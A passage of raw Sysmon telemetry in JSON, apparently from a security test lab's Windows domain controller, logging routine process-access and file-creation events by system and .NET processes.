C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:38.951","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-00105B230E00}","TargetProcessId":"3952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8146,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:39.685\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:39.685","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8147,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:39.732\r\nProcessGuid: {E2A3D6B1-1352-5F25-0000-00105B230E00}\r\nProcessId: 3952\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f70-0\\System.ComponentModel.Composition.dll\r\nCreationUtcTime: 2020-08-01 07:01:39.732","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:39.732","ProcessGuid":"{E2A3D6B1-1352-5F25-0000-00105B230E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\f70-0\\System.ComponentModel.Composition.dll","CreationUtcTime":"2020-08-01 07:01:39.732","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8148,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:39.779\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1353-5F25-0000-001012270E00}\r\nTargetProcessId: 1280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:39.779","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1353-5F25-0000-001012270E00}","TargetProcessId":"1280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8149,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:39.779\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1353-5F25-0000-001012270E00}\r\nTargetProcessId: 1280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:39.779","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1353-5F25-0000-001012270E00}","TargetProcessId":"1280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8150,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:39.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1353-5F25-0000-001012270E00}\r\nTargetProcessId: 1280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:39.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1353-5F25-0000-001012270E00}","TargetProcessId":"1280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8151,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:39.857\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001009FF0C00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:39.857","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001009FF0C00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8152,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:39.857\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001009FF0C00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:39.857","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001009FF0C00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8153,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:39.857\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001009FF0C00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:39.857","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001009FF0C00}","TargetProcessId":"3040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397b